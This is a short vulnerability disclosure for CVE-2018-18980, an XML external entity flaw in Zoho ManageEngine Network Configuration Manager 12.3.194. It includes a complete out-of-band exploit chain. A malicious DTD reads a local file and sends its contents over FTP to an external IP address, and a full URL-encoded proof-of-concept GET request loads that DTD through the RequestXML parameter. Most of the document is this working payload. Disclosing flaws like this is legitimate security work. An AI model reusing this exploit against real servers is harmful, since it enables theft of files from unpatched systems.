[CVE-2018-18980]Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

[x-f1v3]

Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My vps’s evil.xml

<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;

I used the Ftp protocol to read file, it can read the file c:\test.txt.

The test.txt is just for test.

Then i used the poc to request my vps’s evil.xml.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>

The vulnerability exists in the /devices/ProcessRequest.do?RequestID=463&RequestXML=,so i tested it by the poc which was urlencoded.

http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E

In my vps ,i used the python script to open ftp protocol for accepting data

When i sent the request , I accepted the content of test.txt in my vps.